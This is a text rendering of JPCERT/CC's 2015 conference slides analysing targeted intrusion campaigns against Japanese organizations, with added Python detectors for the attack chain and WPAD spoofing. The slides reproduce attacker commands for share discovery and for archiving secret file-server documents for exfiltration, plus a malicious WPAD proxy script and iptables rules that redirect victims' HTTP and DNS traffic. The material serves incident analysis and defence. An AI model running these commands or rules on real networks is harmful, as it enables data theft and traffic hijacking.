
Details of Attack Campaigns Targeting Japanese Organizations by Shusei Tomonaga & Yuu Nakamura - CODE BLUE 2015


JPCERT CODE BLUE 2015

Copyright 2015 JPCERT/CC All rights reserved.


Speakers: Shusei Tomonaga and Yuu Nakamura

JPCERT/CC: Japan Computer Emergency Response Team Coordination Center (CSIRT)


Exploited vulnerabilities:

- Flash Player (CVE-2015-5119, CVE-2015-5122)
- MS14-068 (Kerberos, 3011780) - CVE-2014-6324


Timeline of attack vectors (figure): drive-by download in 2014/05, 2015/01, 2015/05 and 2015/07 (CVE-2014-7247, CVE-2015-5119, CVE-2015-5122); zip / lzh archives in 2014/09, 2014/11 and 2015/09.


Tools observed: dsquery; NirSoft Mail PassView


> net use
-------------------------------------------------------------------------------
OK           T:        \\FILESV01\SECRET          Microsoft Windows Network
OK           U:        \\FILESV02\SECRET          Microsoft Windows Network

> wmic logicaldisk get caption,providername,drivetype,volumename
Caption  DriveType  ProviderName       VolumeName
C:       3                             OS
D:       3
T:       4          \\FILESV01\SECRET
U:       4          \\FILESV01\SECRET

NET USE and wmic list the mapped network drives; DriveType = 4 means a network drive.

> netstat -an
TCP    192.168.xx.xx:49217    192.168.yy.yy:445    ESTABLISHED

> nbtstat -a 192.168.yy.yy
---------------------------------------------
FILESV01

netstat and nbtstat: an established connection to port 445 (SMB) points to a file server, whose name is then resolved with nbtstat.


> dir c:\users\hoge\*.doc* /s /o-d
 c:\users\hoge\AppData\Local\Temp
2014/07/29  10:19            28,672 20140820.doc
               1            28,672
 c:\users\hoge\
2015/08/29  10:03             1,214 .doc

> dir \\FILESV01\SECRET
 \\FILESV\SECRET
2014/07/11  09:16    [DIR]
2014/09/04  11:49    [DIR]
2014/08/01  09:27    [DIR]

dir /s: include subdirectories; /o-d: sort by date, newest first.

> winrar.exe a -r -ed -v300m -ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\ -n*.ppt* -n*.doc* -n*.xls* -n*.jtd
Adding  \\FILESV01\SECRET\\(2015.05.01).docx  OK
Adding  \\FILESV01\SECRET\\.ppt  OK
Adding  \\FILESV01\SECRET\\.xlsx  OK
Adding  \\FILESV01\SECRET\\.jtd  OK

WinRAR collects the documents (recursively, in 300 MB volumes, only .ppt/.doc/.xls/.jtd files modified after 2014/01/01) into a RAR archive, which is then sent to the C&C server.
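As an added example (not from the slides), the following Python applies detection rules for the discovery and collection commands shown above (net use, wmic logicaldisk, netstat, nbtstat, dir, WinRAR) to constructed process-creation log lines and reports hosts where several stages of the chain appear; the log format and stage names are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample process-creation log lines: host|user|command line (not from the slides).
SAMPLE_LOGS = [
    "PC-A|hoge|net use",
    "PC-A|hoge|wmic logicaldisk get caption,providername,drivetype,volumename",
    "PC-A|hoge|netstat -an",
    "PC-A|hoge|nbtstat -a 192.168.yy.yy",
    "PC-A|hoge|dir c:\\users\\hoge\\*.doc* /s /o-d",
    "PC-A|hoge|dir \\\\FILESV01\\SECRET",
    "PC-A|hoge|winrar.exe a -r -ed -v300m -ta20140101 %TEMP%\\a.rar \\\\FILESV01\\SECRET\\ -n*.ppt* -n*.doc* -n*.xls* -n*.jtd",
    "PC-C|alice|wmic logicaldisk get caption",
    "PC-C|alice|dir d:\\reports /s",
]

# One rule per stage of the chain shown on the slides; the stage names are my own.
RULES = [
    ("share_discovery", re.compile(r"^(net use|wmic logicaldisk)\b", re.I)),
    ("server_discovery", re.compile(r"^(netstat\s+-an|nbtstat\s+-a\b)", re.I)),
    # dir against a UNC path, or a search for Office / Ichitaro documents
    ("document_search", re.compile(r"^dir\s+.*(\\\\[^\\ ]+\\|\*\.(doc|xls|ppt|jtd))", re.I)),
    # rar "a" with document masks, split volumes (-v...m) or a modified-after date (-ta...)
    ("archive_staging", re.compile(r"rar(\.exe)?\s+a\b.*(-n\*\.(doc|xls|ppt|jtd)|-v\d+m|-ta\d{8})", re.I)),
]

def classify(cmdline):
    """Return the stage names whose rule matches one command line."""
    return [stage for stage, rx in RULES if rx.search(cmdline)]

def score_hosts(lines, min_stages=3):
    """Collect matched stages per host and report hosts that reached min_stages distinct stages.
    A single dir or net use is normal admin activity; the chain is what matters."""
    stages = defaultdict(set)
    for line in lines:
        host, _user, cmd = line.split("|", 2)
        for stage in classify(cmd):
            stages[host].add(stage)
    return {host: sorted(s) for host, s in stages.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, found in score_hosts(SAMPLE_LOGS).items():
        print(host, found)
```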


Attack using MS14-068 + MS14-058 (figure: Domain Controller, PC-A, PC-B; steps 1 to 6):

1. MS14-058, mimikatz
2. MS14-068, Domain Admin
3. DC, mimikatz, admin
4. PC-B


Attack via SYSVOL (figure: C2 Server, Domain Controller, PC-A, PC-B; steps 1 to 6, with the admin account at step 3)


Figure (PC-A, PC-B, Domain Controller; steps 1 to 5): 1. Domain Admins; 2. logon.exe

Builtin Administrator (figure: PC-A, PC-B; steps 1 to 5):

1. UAC bypass
2. pass the hash, or: net use \\PC-B\IPC$ [password] /u:Administrator


WPAD (Web Proxy Auto-Discovery): the client learns the proxy configuration URL via DHCP or by resolving the name "wpad", then fetches http://wpad/wpad.dat.

WPAD attack, step 1: NetBIOS spoofing (PC-A, PC-B)

1. Broadcast: Name query NB WPAD
2. Name query response ("I am WPAD") sent by wpad.exe

WPAD attack, step 2: fake WPAD server (PC-A, PC-B)

3. request http://wpad/wpad.dat
4. response from wpad.exe with a malicious wpad.dat:

function FindProxyForURL(url, host) {
    if (myIpAddress() != "[PC-A addr]") {
        return "PROXY wpad:8888; DIRECT";
    }
    return "DIRECT";
}

WPAD attack, step 3: man-in-the-middle proxy (PC-A, PC-B)

5. Web requests pass through wpad.exe, which inserts an iframe into the web site's page
6. drive-by download attack from the attacker's web site
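As an added defender-side example (not part of the slides), the following Python builds constructed NBNS name query responses like the one in step 1 above and parses them to find hosts answering for the name WPAD that are not the known-good WPAD server; the allowed_ips list and the packet layout (RFC 1002) are assumptions of this example.

```python
import struct

def encode_nb_name(name, suffix=0x00):
    """NetBIOS first-level encoding (RFC 1001 14.1): pad to 15 bytes, add suffix, two 'A'-based nibbles per byte."""
    raw = name.upper().ljust(15)[:15].encode() + bytes([suffix])
    return b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)

def decode_nb_name(encoded):
    """Reverse of encode_nb_name; returns (name, suffix)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode().rstrip(), raw[15]

def nbns_response(name, answer_ip, txid=0x1234):
    """Constructed positive NBNS name query response (RFC 1002 4.2.13) carrying one answer."""
    header = struct.pack("!HHHHHH", txid, 0x8500, 0, 1, 0, 0)       # response, authoritative answer
    rr_name = b"\x20" + encode_nb_name(name) + b"\x00"               # length 32, encoded name, terminator
    rdata = struct.pack("!H4s", 0x0000, bytes(int(o) for o in answer_ip.split(".")))  # NB_FLAGS + IPv4
    return header + rr_name + struct.pack("!HHIH", 0x0020, 0x0001, 300000, len(rdata)) + rdata

def parse_nbns_response(pkt):
    """Return (name, answer_ip) from a single-answer NBNS response, or None for other packets."""
    _txid, flags, _qdcount, ancount = struct.unpack("!HHHH", pkt[:8])
    if not flags & 0x8000 or ancount < 1 or pkt[12] != 0x20:
        return None
    name, _suffix = decode_nb_name(pkt[13:45])
    _rtype, _rclass, _ttl, _rdlen = struct.unpack("!HHIH", pkt[46:56])
    answer_ip = ".".join(str(b) for b in pkt[58:62])                # skip the 2-byte NB_FLAGS
    return name, answer_ip

def find_wpad_spoofers(packets, allowed_ips=()):
    """Hosts answering NBNS queries for WPAD that are not the known-good WPAD server."""
    hits = set()
    for pkt in packets:
        parsed = parse_nbns_response(pkt)
        if parsed and parsed[0] == "WPAD" and parsed[1] not in allowed_ips:
            hits.add(parsed[1])
    return sorted(hits)

if __name__ == "__main__":
    captured = [nbns_response("WPAD", "192.168.1.50"), nbns_response("FILESV01", "192.168.1.10")]
    print(find_wpad_spoofers(captured, allowed_ips=("192.168.1.5",)))   # ['192.168.1.50']
```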

Summary: AD / MS14-068, DC, SYSVOL, Builtin Administrator, WPAD


Malware used:

- Emdivi (t17): HTTP bot, EXE
- usp10jpg: DLL and data file
- Emdivi (t19, t20): HTTP bot, EXE
- BeginX: EXE
- GStatus: HTTP bot, EXE and DLL

Source: [MWS 2015]

Tools observed (purpose: tool, file names):

- Pass-the-hash: Quarks PwDump (qp.exe, qd.exe, QDump.exe); Mimikatz Lite (gp.exe); Windows Credentials Editor (wce.exe, ww.exe); Mimikatz (mz.exe, mimikatz.exe, mimikatz.rar (sekurlsa.dll))
- MS14-068 (CVE-2014-6324): ms14-068.exe, ms14-068.tar.gz
- MS14-058 (CVE-2014-4113): 4113.exe
- UAC bypass: msdart.exe, puac.exe
- Htran (proxy): htproxy.exe
- NirSoft Mail PassView: CallMail.exe, outl.exe
- logon: logon.exe
- WinRAR: yrar.exe, rar.exe
- dir: dirasd.exe
- timestamp: timestomp.exe

Emdivi (t17) commands (HTTP bot): DOABORT, DOWNBG, GETFILE, LOADDLL, SETCMD, SUSPEND, UPLOAD, VERSION, GOTO (2015/5), CLEARLOGS (2015/8)

Emdivi (t20): SID

usp10jpg: an Emdivi DLL (dwmapi.dll, ***.DAT)

BeginX: consists of BeginX Server (UDP, TCP) and BeginX Client, used together with Emdivi.

Figure: BeginX (Emdivi, BeginxServer, BeginxClient)

GStatus: an HTTP bot like Emdivi (Web)

emdivi_string_decryptor.py: a tool for decoding Emdivi encoded strings

emdivi_string_decryptor.py: differences depending on the version string

          | Ver 17                                   | Ver 19 or 20                        | Ver 20
Encrypt   | XxTEA encrypt                            | XxTEA decrypt                       | AES decrypt
Decrypt   | XxTEA decrypt                            | XxTEA encrypt                       | AES encrypt
Key       | MD5( MD5(base64(ver)) + MD5(key_string)) | Scanf( "%x", Inc_Add( ver17_key ))  | Inc_Add( ver17_key)


Demo

Attack techniques

Figure: attack flow via the Web (steps 0 and 1)


.htaccess: target name, IP address

0day Exploit

Attack techniques


Figure: steps 0 (iptables) and 1

iptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:53

iptables: HTTP requests arriving from the source address aa.bb.cc.dd are redirected to ww.xx.yy.zz port 53.


Attack techniques


Figure: DNS redirection (.com DNS, DNS server, Web server): steps 0 to 2 are DNS queries, step 4 reaches the Web server

iptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 40 --to 46 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:53

iptables DNS redirection: DNS queries whose first label is AAA (AAA.example.com) are sent to aa.bb.cc.dd, all other DNS queries to ww.xx.yy.zz.
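As an added illustration (not from the slides), this Python builds a constructed DNS query inside minimal IPv4 and UDP headers and emulates the string match of the first rule above, showing why --from 40 --to 46 lands on the first label of the queried name (20-byte IP header + 8-byte UDP header + 12-byte DNS header) and which names the rule does and does not catch.

```python
import struct

def dns_query(qname, txid=0x1234):
    """Constructed minimal DNS query: 12-byte header plus one question (type A, class IN)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags 0x0100: recursion desired
    labels = b"".join(bytes([len(p)]) + p.encode() for p in qname.rstrip(".").split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)

def ipv4_udp_packet(payload, sport=40000, dport=53):
    """Wrap the payload in a 20-byte IPv4 header (no options) and an 8-byte UDP header.
    Checksums and addresses are left zero: only the byte offsets matter for the string match."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0, bytes(4), bytes(4))
    return ip + udp

def xt_string_match(packet, pattern, start, end):
    """Emulate iptables -m string --from START --to END: the pattern must lie within bytes [START, END)."""
    return pattern in packet[start:end]

def rule_hijacks(qname):
    """Would the first rule above (--from 40 --to 46 --hex-string "|03|AAA") DNAT this query?"""
    pkt = ipv4_udp_packet(dns_query(qname))
    return xt_string_match(pkt, b"\x03AAA", 40, 46)

if __name__ == "__main__":
    pkt = ipv4_udp_packet(dns_query("AAA.example.com"))
    print(pkt[40:46])   # first label: length byte 3, "AAA", then the start of the "example" label
    for name in ("AAA.example.com", "aaa.example.com", "BBB.example.com", "xAAA.example.com"):
        print(name, rule_hijacks(name))
```

Because --hex-string without --icase is case-sensitive, a query for aaa.example.com is not redirected even though DNS names are case-insensitive; an IPv4 header carrying options would likewise shift the offsets and defeat the match.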


Command table (HTTP; command address / info): 0x184004, 0x184008, 0x18400c, 0x184010, 0x184014, 0x184018, 0x18401c, 0x184020, 0x184024, 0x184028, 0x18402c, 0x184030 (Sleep), 0x184034, 0x184038 (Sleep Time), 0x18403c

Web-based C2: data is delimited by the markers start: @MICR0S0FT / end: C0RP0RATI0N and start: lOve yOu 4 eveR / end: Reve 4 uOy evOl

Command table (command number / info): 0, 1 (TickCount), 3, 4, 5, 6, 7, 8, 9

CVE-2013-3918 with McRAT (figure): ROP, shellcode, malware; the shellcode runs via rundll32.exe

Command table (HTTP): downonly, downexec, -

Preshin Controller (written in PHP)

Command table (HTTP; command number / info): 1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13

Hikit (rootkit) commands: file information, proxy connect, shell, socks5, exit

Derusbi commands: cmd4, cmd5, cmd6, cmd7, cmd8, cmd9

Identity              | Type | Country
System Integrator     | exe  | Japan
Software Vendor       | exe  | Japan
Software Vendor       | exe  | Korea
Automaker             | exe  | Korea
Heavy Industry        | jar  | Korea
Software Vendor       | exe  | Korea
Electronics Industry  | jar  | Korea
Software Vendor       | exe  | Korea

Summary: Backdoor, C2, iptables

Linux backdoors: mod_rootme, Roronoa

Linux backdoor functions: MyNetstat, CreateShell, Mymkdir, PortTunnelGet, GetFileSource, Mymkfile, PortTunnel_RemoteClose, MyPs, Myrmfile, PortTunnel_Show, KillByPid, Myrmdir, CreatePortTunnel, NewConnectTo, ListDir, PortForwardStart, PutFile, my_reboot, PortForward_Show, PutFileDest, ShowHide, PortForward_Close, ShellServer, SwitchHide

apt17scan.py: 1. Scan with YARA; 2. Search configuration data address; 3. Parse configuration data; 4. Dump configuration

Plugin commands: apt17scan, derusbiconfig (Derusbi), hikitconfig (Hikit), agtidconfig (Agtid)

Demo

How to download: https://github.com/JPCERTCC

Thank you

Contact: www.jpcert.or.jp, www.jpcert.or.jp/form/